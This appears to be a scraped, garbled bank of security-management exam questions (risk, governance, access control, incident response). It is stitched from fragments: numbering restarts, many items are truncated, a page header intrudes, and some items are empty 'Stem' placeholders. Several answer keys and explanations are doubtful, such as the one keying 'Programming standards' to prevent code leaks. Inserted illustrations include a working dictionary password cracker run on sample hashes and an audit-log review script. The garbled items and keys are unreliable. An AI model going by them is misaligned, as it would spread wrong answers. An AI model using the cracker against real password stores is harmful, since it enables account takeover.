Baselines provide a level of standardisation around what has been mutually agreed between industry security professionals, vendors and auditors R3

51. What is considered to be the major benefit of an automated risk analysis product?

A. Database of vulnerabilities.
B. Database of threats.
C. Minimal effort to rerun the analysis.
D. Ability to handle complex calculations.

Whilst an automated tool often comes with a database of information, this may not be entirely relevant. Consequently, it should be used with care. What is of benefit is that once the database is set up, the analysis can be re-run with minimal effort R3

52. Why is risk management an important senior management responsibility?

A. They are responsible for business operations and the IT procurement process.
B. They are responsible for ensuring that proper controls are in place to address integrity.
C. They must operate under a standard of due care and with ultimate responsibility for mission accomplishment.
D. They are responsible for budgeting and performance.

Executive management are required to manage with appropriate skills and with due care, not negligently R3

53. What is the typical output of a risk assessment?

A. An inventory of risks that may impact the enterprise.
B. Documented threats to the enterprise.
C. Evaluation of the consequences to the entity.
D. A list of appropriate controls for reducing or eliminating risk.

The output of a risk assessment should be a list of countermeasures to reduce risk to acceptable levels R4

54. Which one of the following is a popular technique used to report the status of identified risks?

A. Gantt chart.
B. Heat map.
C. PERT diagram.
D. Critical Path Analysis.

Heat maps use the colours red, amber and green to illustrate how serious the concern is to management R2

55. Which one of the following statements about information classification is true?

A. Security and availability have interchangeable characteristics.
B. Information classification is a business decision process.
C. Information classification is a technical process best left to security specialists.
D. The greater the number of information classification categories the better.

The decisions about classification are based on business requirements for different protection levels. The fewer the better R2

56. It is good practice that the security classification be undertaken by:

A. Business managers.
B. Security officer.
C. Individuals responsible for the information.
D. IT management.

The decisions about classification are based on business requirements for different protection levels. The fewer the better R3

57. Scientific processes for risk management, based on probabilities, risks and threats, can prove impractical due to a shortfall in which one of the following?

A. Experience.
B. Budget.
C. Tools.
D. People.

Available budget is often limited, consequently only the most critical risks can receive attention R2

58. Criticality of information systems is measured on two scales: tolerable period of outage and which one of the following?

A. Tolerable period to recover systems.
B. Tolerable period to relocate.
C. Tolerable period to recover backup systems.
D. Tolerable period to overcome the backlog of transactions.

The transaction backlog after an outage is restored can often be a killer. Managing the backlog down to zero may be very difficult R4

59. Stem

A. correct option 1.
B. option 2.
C. option 3.
D. option 4.

Explanation R1

60. Stem

A. correct option 1.
B. option 2.
C. option 3.
D. option 4.

Explanation R1

1. In planning for physical security, a series of barriers at different points may be considered. Each level of physical protection should have:

A. Different points of entry to distribute the risk of penetration.
B. A published statement of activity within each perimeter.
C. Colour-coded documentation for each protection level.
D. A defined security perimeter with consistent protection.

D is correct since consistent protection on the perimeter is essential: security breaches will occur at the weakest points, and therefore security is only as good as the weakest link. A, B and C all have the opposite condition as being true R4

2. IT security practitioners (e.g., network, system, application, and database administrators; computer specialists; security analysts; security consultants) are responsible for which one of the following security-related activities?

A. Mission accomplishment.
B. Risk management.
C. Planning, budgeting, and performance measurement.
D. Proper implementation of security requirements in their IT systems.

Security practitioners are expected to focus on the proper implementation of security requirements in their IT systems. Security management and business management will focus on the other activities R4

3. A discretionary access control mechanism is based on which one of the following?

A. Information value.
B. File permission sets.
C. Sensitivity labels.
D. System classification.

Discretionary access control is often in the form of access control lists associated with files, i.e. file permission sets R2

4. An information security manager who is about to plan an upgrade of network security would require which one of the following first?

A. Site diagnostic and survey.
B. Service level agreement.
C. High level diagnostic and review.
D. Implementation plan.

The high level diagnostic is used to plan the more detailed site diagnostic and surveys, which would be followed by an implementation plan to improve security and a service level agreement to maintain security R3

5. The best justification for the implementation of baseline security controls is which one of the following?

A. Specified by vendors.
B. Designed by experts.
C. Successful common practice.
D. Comprehensive by nature.

C is correct as baseline controls are based on good practice. They are not sourced from vendors nor experts. Baseline controls are not intended to be comprehensive R3

6. Baseline security controls can be used best for which one of the following activities?

A. Securing unstable environments.
B. Strengthening security standards.
C. Detailing security implementation tasks.
D. Establishing a corporate security policy.

B is correct as the baseline sets the common level of standards that is typically attained. It is a way to quickly get going with security implementation. Unstable environments would need careful assessment and specific controls identified. Detailing security implementation tasks or first defining policy are more thorough, but time consuming, approaches R2

7. Which one of the following is the best metric to manage the information security program(me)?

A. Number of systems subject to intrusion detection.
B. Number of recorded deviations from minimum information security requirements.
C. Amount of downtime caused by security incidents.
D. Time lag between detection, reporting and acting upon security incidents.

The number of systems subject to intrusion has no relevance to the quality of security management but more to do with the enterprise's vulnerability. The amount of downtime is a measure of the scale of the threat. The time lag is a measure of the responsiveness of the security team. But the number of deviations from set requirements is a direct correlation to the quality of the security programme R2

8. Baseline security measures are used to address which one of the following:

A. Specific business needs.
B. Common control requirements.
C. Particular risk profiles.
D. A minimum level of loss.

B is the correct answer because baseline controls result from a set of common control requirements developed through the collaborative efforts of companies with similar interests. Baseline does not address specific needs, nor does it address particular risk profiles. Nor does baseline relate to a minimum level of loss. It is addressing a common requirement R2

9. Which one of the following is an example of a preventative technical control?

A. Non-repudiation.
B. Internal audit.
C. Restore secure state.
D. Intrusion detection.

Non-repudiation is a preventative control associated with authentication R1

10. What would be the purpose of an enterprise's Board setting direction for information security, driving policy and information security strategy?

A. Developing a mission statement.
B. Defining an enterprise risk profile.
C. Allocating accountability.
D. Selecting specific security solutions.

The Board would be setting out the enterprise's appetite for risk, i.e. their risk profile R2

11. Formal standards / procedures should be driven by business requirements and focused on issues that:

A. Cause the enterprise the most harm.
B. Cause the least concern.
C. Cause customers the most satisfaction.
D. Cause the least vulnerability.

Formal standards / procedures should be driven by business requirements, based on practical experience and focused on issues that cause the most harm R1

12. Which one of the following statements about the information security architecture is least likely to be correct?

A. It provides a framework to produce high level policy statements and strategies, detailed specifications, guidelines, standards and job descriptions.
B. It describes the form, appearance, function and location of information security processes.
C. It provides a common basis for the design, development, implementation and management of the information security process.
D. It provides the basis on which the enterprise technology architecture will be selected and implemented.

D is the correct answer. Security architecture does not normally determine the technology architecture. Security is derived from technology. A, B and C are all true statements about security architecture R4

13. The security administration effort will be greatly reduced through the deployment of which one of the following techniques?

A. Discretionary access control.
B. Access control lists.
C. Role based access control.
D. Mandatory access control.

Role based access control is correct because it separates individuals from roles and ties access to specific roles. This reduces the security administration effort when individuals change positions within the enterprise. A, B and D are normally associated with the identity of individuals, creating a much more challenging administration environment R3

14. Formal standards / procedures should be driven by business requirements, but based on:

A. User requests.
B. Industry expert advice.
C. Management opinion.
D. Practical experience.

Formal standards / procedures should be driven by business requirements, based on practical experience and focused on issues that cause the most harm R4

15. Which one of the following is an example of an information security governance best practice?

A. Management has addressed the interconnectivity of systems.
B. Minimal involvement of the Board in risk management processes.
C. The Board has established ownership for security and continuity with enterprise managers.
D. IT security issues are kept separate from business issues.

B and C are potential governance issues, but B is incorrect, making C the only correct answer R3

16. Which one of the following is an example of an information security governance best practice?

A. Management has standardised on one anti-virus solution.
B. Management maintains a record of security personnel overtime charges.
C. Management receives regular reports on the number of security incidents occurring.
D. Management has a view on how much the enterprise should invest in IT security improvements.

18. Which one of the following items would be a key deliverable from the project planning phase of the security implementation plan?

A. Detailed description of business processes and data model.
B. Initial security rating for availability, confidentiality and integrity requirements.
C. Description of the system specific controls to be developed.
D. Definition of tests to be carried out on all controls.

During the project planning phase it is most likely that only provisional information is available, like initial security ratings. During later phases business process modelling, identification of system specific controls and testing would be performed R2

19. Why is it important that the awareness of security baselines is integrated in the design and management of security for business applications and the infrastructure?

A. It removes the need to document security requirements.
B. Incorporating security post implementation is difficult.
C. Helps with the development of better security assessment programs.
D. It removes the requirement for a risk assessment.

Changes to applications have traditionally been difficult to implement after implementation and are costly R2

20. Which one of the following is an example of a preventative management security control?

A. Incident response capability.
B. Periodic system audits.
C. System security plans.
D. Personnel clearance checks.

A plan of action is a preventative control whilst the other options are detective R3

21. When is the prototyping approach to developing a security solution most appropriate?

A. When the solution is obtained from a reputable vendor.
B. When the solution is technically complex.
C. When the solution is developed by inexperienced staff.
D. When the solution's functional specification is not clear.

A is incorrect since the functionality is already fixed. B is incorrect as prototyping would be an inefficient way to solve technically complex issues. C is inappropriate, as inexperienced staff will battle with the loose development style associated with prototyping. D is correct because prototyping specifically addresses a step by step development process, checking the user requirement all the way R4

22. Which one of the following provides the best mapping of access privileges to an enterprise's organizational structure?

A. Group based access control.
B. Discretionary access control.
C. Mandatory access control.
D. Role based access control.

Roles are associated with specific positions in an organization. They are not mapped directly to individuals. Mandatory access control is applied to resources, whilst discretionary and group based privileges are associated with individuals or groups of individuals R4

23. Firewalls are used to protect an entity's internal resources and would typically include which one of the following features?

A. Stateful packet analysis.
B. User authentication.
C. Dial-up security.
D. Virus controls.

A firewall filters the packets in the process of deciding to let them pass through or be rejected R1

24. Which of the following can best describe the three pillars of Information Security?

A. Strategy, Tactical, and

interception.
C. A digital digest can correspond to only one specific message.
D. A digital digest can be calculated quicker than a checksum.

A digital digest is created by establishing a unique hash total for a particular string of characters. Consequently a digital digest corresponds to only one specific message (C). The other options are all incorrect statements about digital digests R3

28. What would

M, whilst the rest are measures for information security R2

36. Which one of the following would be a good performance measure of Information Security succeeding?

A. Full compliance, or agreed and recorded deviations from minimum security requirements.

B. Percent of IT security plans and policies communicated to all stakeholders.
C. Immediate reporting on critical incidents.
D. Number of critical infrastructure components with automatic availability monitoring.

D relates to Security Management (an enabler/KPI of security management), whilst the rest are measures for information security governance (KGIs) R4

37. What would be the main objective of enforcing a clear desk policy?

A. Reducing the risk of a fire hazard.
B. Avoiding unauthorized access.
C. Proper documentation control.
D. Security workflow procedure.

A is partly true, but not the main objective. B is correct as it reduces the risk of unauthorized access to information. C and D are inappropriate answers R2

38. Which one of the following would be a good performance measure of Information Security succeeding?

A. Alignment of access rights with organizational responsibilities.
B. Number of incidents involving unauthorised access.
C. No security incidents causing public embarrassment.
D. Number of new implementations delayed by security concerns.

C relates to Security Management (an enabler/KPI of security management), whilst the rest are measures for information security governance (KGIs) R3

39. E-mail systems have proved to be a useful source of evidence, particularly at times of litigation. What is the primary reason for this?

A. Strong access controls establish accountability for activity on the e-mail system.
B. Data classification is often used to regulate what information should be communicated via e-mail.
C. Clear policy for using e-mail within the enterprise ensures that the right evidence is available.
D. Poor housekeeping leads to excessive cycles of backup files remaining available.

E-mail is generally poorly controlled, and because of instability, numerous copies of files are often stored for long periods of time R4

40. In which system development life cycle stage would the detailed specification for security be prepared?

A. Construction.
B. Solution Definition.
C. Requirements analysis.
D. Implementation.

Specifications are developed as part of the development of a definition for an appropriate solution R2

41. What is a key activity necessary prior to the definition of controls?

A. Analyze residual risk.
B. Analysis of threats and vulnerabilities.
C. Definition of tests.
D. Quality control.

Controls are countermeasures to reduce risk. Therefore the analysis of threats and vulnerabilities is required R2

42. The assessment of risk is M

A. Critical success factors.
B. Key performance indicators.
C. Key goal indicators.
D. Market trends.

Key performance indicators are 'lead' indicators about the enablers for information security to satisfy key goals and ultimately business objectives R2

47. When using external resources the security manager must personally maintain which one of the following?

A. Incident management response.
B. Chain of command.
C. Development of procedures.
D. Regular appraisal of contract staff.

When utilizing external resources, the responsibility still resides with the information security manager. Therefore the security manager must have an incident management capability R1

48. Which one of the following activities is part of configuration management?

A. Procurement.
B. Manage contracts.
C. Change management.
D. Manage retirement.

Change management is part of the configuration lifecycle, whilst the other options are part of the asset management lifecycle R3

49. The evaluation of a security service or product against the Common Criteria will have as its primary objective the performance of which one of the following?

A. Engineering due diligence.
B. Cryptography review.
C. Process controls.
D. Product interoperability.

The Common Criteria focuses on establishing the reliability of the engineering processes with a view to ensuring that these cannot have compromised the final product R1

50. The review of a cryptographic module is most likely to be in accordance with which one of the following?

A. Common Criteria.
B. FIPS 140 specification.
C. ISO 9000.
D. ISO 17799.

FIPS 140 is a cryptography specification, the Common Criteria is an engineering specification, ISO 9000 is a quality management standard and ISO 17799 is a security management standard R2

51. What would be a primary driver for an enterprise to certify and accredit compliance of business applications and infrastructure to the enterprise's information security governance framework?

A. Globalization standards.
B. Insurance contracts.
C. Management commitment.
D. Internal audit requirements.

For an enterprise to certify and accredit compliance of business applications and infrastructure to the enterprise's information security governance framework requires a great deal of management commitment R3

52. Which one of the following is a considerable advantage of optical fibre?

A. Cheap.
B. Easy to install.
C. Readily available.
D. Suitable for long distances.

D is the only advantage; the other options are usually disadvantages R4

53. As 'virtual networks' proliferate, users need access to many back-end databases. Which one of the following is likely to be the most burdensome task to overcome?

A. Centrally managing users and roles.
B. Implementing levels of user authentication.
C. Defining users for each database.
D. Securing sensitive data from the database administrators.

The most time consuming task is setting up users and their privileges on the various databases R3

54. Which one of the following is the most significant benefit of an anti-piracy policy to an organization?

A. It prevents staff from using illegal software on the entity's computers.
B. It focuses management attention on matters for discipline in the entity.
C. It reduces the likelihood of successful litigation against the entity.
D. It ensures staff are able to distinguish between legal and illegal software.

Whilst a policy has the objective of communicating management's attention, should litigation occur a clear policy on anti-piracy quickly reduces the likelihood of its success R3

55. Which one of the following approaches is most likely to be people resource intensive?

A. Role based access control.
B. Token based control lists.
C. Discretionary based access control.
D. Group based access control.

Discretionary based access control requires every individual with access privileges to be listed on the access control list of each protected resource. Each of the other approaches has a greater degree of consolidation than the individual level R3

56. How would a security manager prioritize the amount of physical, administrative and technical controls to employ?

A. Internal audit expectation.
B. Risk assessment.
C. Technical architecture.
D. Vendor recommendation.

5. Business knowledge is essential for information security as it is necessary to conduct which of the following?

A. Cost benefit analysis.
B. Countermeasure design.
C. Describe core functionality.
D. Estimate project costs.

Interpreting information security policies into operational use requires the security manager to perform a cost benefit analysis R1

6. An information security manager would issue a security guideline with which one of the following objectives in mind?

A. A specific information security program in mind.
B. Provide a statement for the overall design and operation of security.
C. Directions for preferred levels of security and programs.
D. Keep the number of alternative solutions to a minimum.

A guideline is used to communicate the preferred levels of security and to offer guidance regarding security programs R3

7. How does top level management best demonstrate their commitment to the information security efforts?

A. Appointing a security officer.
B. Participating in discussions.
C. Signing statements of support.
D. Providing sufficient resources.

Providing resources is the clearest and strongest statement of all R4

8. How can an enterprise achieve a consistent standard of good practice for information security across the enterprise?

A. Through security awareness campaigns.
B. Through detailed security guidelines.
C. Through clear direction from top management.
D. Through the use of a mission statement.

Top management direction will ensure that information security receives appropriate attention.

  • 8/16/2019 simlado cobit 5

    22/33

A. Availability of choices.
B. Support for users.
C. Technical ability.
D. Reporting of activity.

Responsiveness is matched by a need for flexibility. Answer: A

16. How could the information security manager BEST minimize the risk of proprietary coding standards being shared with competitors' programmers?

A. Programming standards.
B. Non disclosure agreements.
C. Code of practice for staff.
D. Regular development project audits.

Answer: A

25. A central characteristic in preparing an information security function's mission statement is which one of the following?

A. Ethics.
B. Priority.
C. Vision.
D. Values.

Mission statements that are laundry lists of every responsibility possible are usually greeted with the disdain they deserve. Mission statements set targets and distinguish between what is important and what is not. Answer: B

26. A standard, in addition to describing a process or object, is primarily used for which one of the following purposes?

A. Measurement of compliance.
B. Guidance about choices.
C. Descriptive regarding 'how to'.
D. Step by step in detail.

A standard describes a process in a manner such that compliance with the specification can be measured and the expected benefits from the process determined. Answer: A

27. To manage the success of the investments in information security, the information security manager must ensure that there is alignment with business expectations through the use of which one of the following tools or techniques?

A. Gap analysis.
B. Cost benefit analysis.
C. Key performance indicators.
D. Project management.

Key performance indicators are used to manage and monitor processes to ensure that business objectives are met. Answer: C

28. The security manager can use the CobiT maturity model as a basis for which of the following?

A. Alignment with goals.
B. Continuous improvement.
C. Cost benefit analysis.
D. Sensitivity analysis.

Maturity modelling is associated with building increasingly sophisticated capability. Answer: B

29. The philosophy of control in open systems should always be to improve on current levels of performance. Tools to accomplish this include:

A. PERT methods.
B. Benchmark metrics.
C. Maturity models.
D. Quality measurements.

The principle behind a maturity model is to define stages of maturity and then to measure the entity against these stages of maturity. Answer: C

30. Why is a hardware based firewall generally considered better than a software based approach?

A. More secure.
B. Better performance.
C. More reliable.
D. Better documentation.

Better performance can be obtained from hardware based solutions. Answer: B

31. Which one of the following is an example of a vulnerability assessment?

A. Scenario planning.
B. Penetration testing.
C. Intruder detection.
D. Threat analysis.

Penetration testing is an example of a vulnerability test. Answer: B

32. A password cracker is a tool best suited to assessing which one of the following?

A. Business impact.
B. Sensitivity.
C. Vulnerability.
D. Risks.

A password cracker is used to establish the vulnerability of passwords to being exploited. Answer: C
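As an added illustration of what such a tool actually establishes (this example is not part of the original question set), the Python below runs a dictionary attack with common mangling rules against a set of stored password hashes and reports which accounts fall. The records, the wordlist and the "user:salt:sha256" storage format are constructed for the example; production systems should store passwords with a slow KDF such as bcrypt or Argon2, which a real cracker would also have to handle, and the point of running one is to measure how many accounts are exposed, not to estimate business impact or overall risk.

```python
import hashlib
import itertools

# Hypothetical storage scheme for the demo: sha256(salt + password) in hex.
# Real systems should use a slow, salted KDF (bcrypt, scrypt, Argon2).
def _h(salt: str, password: str) -> str:
    return hashlib.sha256((salt + password).encode()).hexdigest()

# Constructed sample records in the shape "user:salt:hexdigest".
SAMPLE_RECORDS = [
    f"alice:7f3a:{_h('7f3a', 'password')}",
    f"bob:19c2:{_h('19c2', 'Summer2019!')}",
    f"carol:e0d1:{_h('e0d1', 'Welcome1')}",
    f"dave:44b9:{_h('44b9', 'xK9#pL2$vQ8m')}",   # long random secret
]

# Constructed wordlist standing in for a real dictionary (e.g. rockyou).
WORDLIST = ["password", "welcome", "summer", "letmein", "qwerty"]

def mangle(word: str):
    """Yield the usual cracker variations of a dictionary word:
    case changes combined with common numeric / symbol suffixes."""
    bases = {word, word.capitalize(), word.upper()}
    suffixes = ["", "1", "123", "!", "2019", "2019!"]
    for base, suffix in itertools.product(sorted(bases), suffixes):
        yield base + suffix

def crack(records, wordlist):
    """Dictionary attack: return {user: recovered_password} for every hash
    that matches some mangled wordlist entry. Accounts whose passwords
    resist the attack are simply absent from the result."""
    found = {}
    for record in records:
        user, salt, digest = record.split(":")
        for word in wordlist:
            hit = next((c for c in mangle(word) if _h(salt, c) == digest), None)
            if hit is not None:
                found[user] = hit
                break
    return found

def vulnerable_fraction(records, wordlist) -> float:
    """Share of accounts whose password fell to the dictionary attack;
    this is the vulnerability figure a cracking run gives the manager."""
    return len(crack(records, wordlist)) / len(records)

if __name__ == "__main__":
    for user, pw in crack(SAMPLE_RECORDS, WORDLIST).items():
        print(f"{user}: recovered '{pw}'")
    print(f"accounts vulnerable: {vulnerable_fraction(SAMPLE_RECORDS, WORDLIST):.0%}")
```

Three of the four constructed accounts fall (the fourth uses a long random secret that no mangling rule reaches), which is exactly the kind of finding a cracker delivers: a measure of how exposed the password population is, with no statement about sensitivity, impact or the likelihood that someone exploits it.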

33. Why is it important that the security implication of a change be managed early in the process?

A. All changes to controls must be traceable.
B. Trivial changes should not require authorization.
C. Emergency changes should not require documentation.
D. Not all changes need justification.

All changes to controls must be traceable and undertaken in a controlled manner. Answer: A

34. What technique is used to ensure that appropriate changes are made to all deliverables throughout the life cycle?

A. Program library.
B. Version control.
C. Tape library.
D. Control totals.

Version control is the way to establish control over deliverables. Answer: B


35. Which one of the following is the M


45. How can the information security manager check that security administrators are performing their tasks responsibly?

A. Review access permission change request procedures.
B. Examine a log of all user activity.
C. Inspect a log of failed access attempts.
D. Customer satisfaction surveys.

Inspecting the log of all user activity, including the administrators' own actions, will highlight weaknesses in the system that arise from unauthorised activity. Answer: B
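One way to turn option B into a concrete check, added here as an example and not part of the original question set: reconcile the administrators' permission-change log against the register of approved change requests and report every change that no approved ticket justifies. The key=value log layout, the field names, the user names and the ticket numbers below are all constructed for the illustration; real directory or database audit logs differ in format but carry the same information.

```python
import re
from dataclasses import dataclass

# Constructed audit-log lines (hypothetical key=value layout).
SAMPLE_LOG = """\
2019-08-16T09:12:03Z admin=jsmith action=GRANT role=DBA target=mwong ticket=CHG-1042
2019-08-16T09:30:11Z admin=jsmith action=GRANT role=DBA target=jsmith ticket=-
2019-08-16T10:02:45Z admin=akim action=REVOKE role=DBA target=mwong ticket=CHG-1042
2019-08-16T10:15:09Z admin=akim action=GRANT role=ADMIN target=tlee ticket=CHG-7001
2019-08-16T11:40:22Z admin=akim action=GRANT role=ADMIN target=tlee ticket=CHG-1042
"""

# Constructed register of approved change requests: ticket -> (target, role).
APPROVED = {
    "CHG-1042": ("mwong", "DBA"),
}

LINE_RE = re.compile(
    r"^(?P<ts>\S+) admin=(?P<admin>\S+) action=(?P<action>GRANT|REVOKE) "
    r"role=(?P<role>\S+) target=(?P<target>\S+) ticket=(?P<ticket>\S+)$"
)

@dataclass(frozen=True)
class Finding:
    ts: str
    admin: str
    reason: str

def review_permission_changes(log_text: str, approved: dict) -> list:
    """Check every privilege change an administrator made against the
    approved change register. Returns one Finding per unjustified change;
    an empty list means every change was covered by an approved ticket."""
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            # A line the parser cannot read is itself worth a look.
            findings.append(Finding("?", "?", f"unparseable line: {line!r}"))
            continue
        f = m.groupdict()
        if f["admin"] == f["target"]:
            findings.append(Finding(f["ts"], f["admin"], "self-granted privilege"))
            continue
        if f["ticket"] == "-":
            findings.append(Finding(f["ts"], f["admin"], "no change ticket recorded"))
            continue
        approved_change = approved.get(f["ticket"])
        if approved_change is None:
            findings.append(Finding(f["ts"], f["admin"], f"unknown ticket {f['ticket']}"))
        elif approved_change != (f["target"], f["role"]):
            # Ticket exists but was approved for a different user or role.
            findings.append(Finding(
                f["ts"], f["admin"],
                f"ticket {f['ticket']} does not cover {f['role']} for {f['target']}"))
    return findings

if __name__ == "__main__":
    for finding in review_permission_changes(SAMPLE_LOG, APPROVED):
        print(f"{finding.ts} {finding.admin}: {finding.reason}")
```

On the constructed log the check flags three of the five changes: a self-grant, a grant under a ticket that is not in the register, and a grant that reuses a legitimate ticket for a different user and role. Option A alone (reviewing the procedure) would have found none of these, and option C (failed attempts) does not see successful but unauthorised changes at all.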

46. The security manager is expected to fulfill which one of the following roles when working with internal and external assurance providers?

A. Guide.
B. Manager.
C. Liaison.
D. Assistant.

The assurance process is a key process within the information security program, and the information security program can benefit from the periodic reviews. Consequently, the security manager should act as a liaison point. Answer: C

47. Which one of the following is a universal standard to evaluate the security and assurance levels of technology products?

A. ISO 17799.
B. Common Criteria.
C. CobiT.
D. SAS 70.

The Common Criteria is the result of the harmonisation of the US and European standards for security evaluation and accreditation. ISO 17799 is a code of practice for information security; CobiT is an IT process control model; SAS 70 defines the scope of an audit. Answer: B

48. Vulnerability scanner reports often serve as a wakeup call for management, but are not very useful in providing assurance in which one of the following instances?

A.


reporting service is typically an early warning mechanism enabling security managers to respond instantly to new vulnerabilities. Answer: B

55. Knowledge of civil unrest or protest near the enterprise's facility would require which one of the following actions?

A. Permanent increase in physical security.
B. Temporary increase in baseline for physical security.
C. Improvement in logical access control.
D. No action is required as the event is external to the enterprise.

Baseline security should be increased to match the threat and reduced again once it is no longer necessary. Answer: B

56. Which one of the following will be the most important part of problem management practices for security?

A. Being systematic.
B. Tracking results.
C. Define the problem.
D. Maintaining protection.

The security manager will require that the necessary levels of protection exist throughout the process of handling a problem issue. Answer: D

57. Which one of the following should be standard practice for problem management after the emergency fixes have been made?

A. Emergency fixes should be properly documented.
B. Senior management should approve the emergency fixes.
C. Authorisation for emergency access should be revoked.
D. Emergency fixes should be tested in the test environment.

Emergency fixes should be reversed, making options A, B and D inappropriate. Authorisation for emergency access should be revoked immediately. Answer: C

58. Which one of the following is a useful metric to measure problem management?

A. Number of information security problems in the month.
B. Awards received for dedication to the task.
C. Average time and manpower needed to resolve a problem.
D. Number of items in the auditors' report related to problem management.

The most useful metric is the average time and manpower needed to resolve a problem. The number of problems arising has less to do with problem management itself. Similarly, dedication to the job is great, but vague. The auditors' report is not a scorecard but an opinion on items for improvement. Answer: C

59. How can the frequently held view amongst staff that information security policies result in excessive administrative burden best be overcome?

A. Executive support is obtained.
B. Administrative guidelines.
C. Clear documentation.
D. Awareness training.

Executive support would be the best indicator to staff that security policies are to be taken seriously. Answer: A

60. An information security manager concerned with the integration and operation of security solutions across the enterprise would use which one of the following approaches to influence others?

A. Information security guideline.
B. Information security standard.
C. Information security policy.
D. Information security architecture.

An information security architecture is used to communicate at a high level the requirements for information protection. Answer: D

1. Reports received from vulnerability scans often serve as a wakeup call for management. Network vulnerability scanners are useful for all except one of the following. Which one is the exception?

A.


first point of the incident response process to test would be which one of the following?

A. Team members' knowledge of what to do.
B. The review of system logs.
C. The qualifications of the team members.
D. Users' knowledge of who to call.

A critical, and often overlooked, step in incident response is knowing who to call. Thereafter, the other activities may follow. Answer: D

5. A proactive and practical technique for protection against malicious code is which one of the following?

A. Prohibit the downloading of program code.
B. Filter downloaded program code for key words.
C. First execute downloaded programs in a 'sandbox'.
D. Permit code to be downloaded only from trusted sources.

A - This may prevent legitimate computing; B - This is not very reliable; C - This is the only practical solution; D - This may hinder legitimate computing. Answer: C

6. Comprehensive response and recovery strategies are developed based on which one of the following?

A. Business impact assessment.
B. Risk assessment.
C. Information security management's planning.
D. Senior management's approval.

Whilst all the options are true, the basic requirement is that response and recovery strategies must be developed according to senior management's approval, thereby incorporating their authority and commitment to providing adequate resources. Answer: D

7. Training the response and recovery teams is undertaken with which one of the following objectives in mind?

A. Familiarity with their responsibilities.
B. Avoid unnecessary detail in the documentation.
C. Empower employees to take decisions as necessary.
D. Focus on weaknesses in the technology.

Training is essential in ensuring that the persons selected gain familiarity with their responsibilities. All significant detail must be recorded in the BCP document, and decision making by employees should be pre-empted with clearly defined processes. Technology is not the primary focus; rather, the aim is an end-to-end understanding of the recovery of an entire business process. Answer: A

8. Emergency management activities typically include which one of the following?

A. Safety of personnel.
B. Testing of procedures.
C. Dealing with legal issues.
D. Cleaning of soiled equipment.

Emergency management typically revolves around large scale crisis management that includes personnel from various external bodies and government agencies. Answer: A

9. Experienced professionals generally consider the use of a methodology to have which one of the following characteristics?

A. Too slow for situations that are dynamic in nature.
B. Provides structure and order for most situations.
C. Inhibiting to experienced security professionals.
D. Unnecessarily expensive for the majority of incidents.

Pandemonium can and does often occur very quickly when security related incidents happen, and simultaneous incidents are more often the case than not. A methodology therefore helps prevent the situation from getting out of control, even for seasoned professionals. A methodology often includes the use of proven tools that result in greater efficiency and ultimately a lower cost. Answer: B

10. Which one of the following is a frequent reason given for the failure of Incident Response initiatives?

A. Time.
B. Knowledge.
C. Personnel.
D. Funding.

Responding to security incidents is not cheap, and under-funding is cited as a common problem. Knowledge is generally available from various sources including the Internet. With knowledge, personnel can be trained. Time is a function of the availability of knowledgeable people. Answer: D

11. A petroleum company whose greatest assets are its data regarding where crude oil deposits are located has its data stored in databases on its subnets located around the world. Assume countermeasures to the known vulnerabilities are in place, except that in reality patching systems is a slow and disjointed process and several vulnerabilities are being exploited. Which one of the following is likely to be the first incident response step?

A. Perform penetration tests and determine the steps necessary to penetrate these systems.
B. Review the latest risk assessment and establish whether current countermeasures are adequate.
C. Understand as much as possible about the systems in use, including how they could be compromised.
D. Perform a vulnerability assessment for the assets in question.

Common practice is to start with gaining a proper understanding of the systems and then determining how incidents that could occur can be dealt with. Irrespective of the extent of any vulnerability, a determined hacker will breach the security. Risk assessments date quickly and therefore countermeasures can quickly become obsolete and consequently breached. Penetration tests provide evidence of the weaknesses that exist and are most useful to prove a vulnerability that has already been identified. Both of these highlight the existence of weaknesses and are therefore useful, but they are not the first step. Answer: C

12. Why is the development of a computer emergency response team favored?

A. It lowers the budget.
B. Enables better coordination.
C. Frees users from this responsibility.
D. Solves staffing issues.

Typically, it requires a good (big) budget. It does result in better coordination, as dedicated persons can build relationships as appropriate. It does not free users from their responsibilities; rather, it helps users. Staffing issues can only be solved if the correct staff can be employed, which is often not the case. Answer: B

13. Using a methodology to respond to a security related incident is almost an absolute requirement for legal considerations, the most obvious being which one of the following?

A. Adherence to statutory audit requirements.
B. Demonstrating due care.
C. Data protection law.
D. Working with law enforcement agencies.

Adopting a reasonable and responsible set of measures to guard against harm will constitute due care and avoid a possible lawsuit for incompetence in dealing with an incident. Answer: B

14. From which one of the following organizational units is an Incident Response function most likely to encounter resistance?

A. Internal Audit.
B.


21. Good practice in testing a business continuity plan is considered to be which one of the following?

A. Start small and gradually increase complexity.
B. Avoid processes that could have a significant negative impact.
C. Never introduce unplanned events to the test script.
D.


deleted files. This is the most effective approach for forensic purposes. Answer: A

41. What is the primary purpose of a post incident follow up review?

A. Determine if management has taken appropriate corrective action.
B. Complete items that could not be finalised during the review.
C. Review the performance of the review team.
D. Determine if the assessment program is adequate for that particular review.

A typical objective of the post incident meeting is to find out whether management has already taken corrective action. Answer: A

42. The post incident review and follow up procedures of the incident response team are essential for which one of the following reasons?

A. Keep the team's resources fully occupied.
B. Build team spirit.
C. Attribute blame for team member mistakes.
D. Use the lessons learned to improve skills.

Follow up provides an opportunity to use the lessons learned to improve the skills of the entire team, and specifically of new team members. It is not about blaming individuals, but rather about improving the methodology. Team building may be a secondary objective. It should not be about simply deploying team members just to keep up the appearance of being fully occupied. Answer: D

and they can trust your opposition, they might move to them. Similarly, if security is very important to your customers, your entity can attract customers through offers of higher levels of trust. Answer: D

47. The enterprise value proposition for information security is best established through which one of the following?

A. IT alignment with business goals.
B. Key performance indicators.
C. Historical loss records.
D. Annual loss expectancy calculation.

The method for establishing the enterprise value of information security is to align IT with business goals. This is done by cascading the key goal indicators of the business down to IT and then down to information security management. Key performance indicators measure short term (daily or monthly) activities and would not give an indication of the enterprise value. Historical records may not be an accurate reflection. The annual loss expectancy may provide some insight, but it is focused on the monetary loss. Answer: A

48. Where it is difficult to determine fully the tangible benefits from an investment, as is the case for information security, the investment decision is influenced mostly by which one of the following?

A. Penetration test results.
B. Benchmarking.
C. Availability of cash.
D. Management policy.

Management policy provides direction for the implementation of security, particularly when tangible benefits are not clear and the decision is closely linked to management's risk appetite. The other options are inappropriate. Answer: D

49. Biometric devices can be considered to be which one of the following?

A. Something you know.
B. Something you have.
C. Something you are.


Awareness should start when the employee joins the enterprise. Answer: D

60. Good advice for developing an enterprise wide security awareness campaign is which one of the following?

A. Resist the influence of culture.
B. Keep it simple.
C. Concentrate on a single medium.
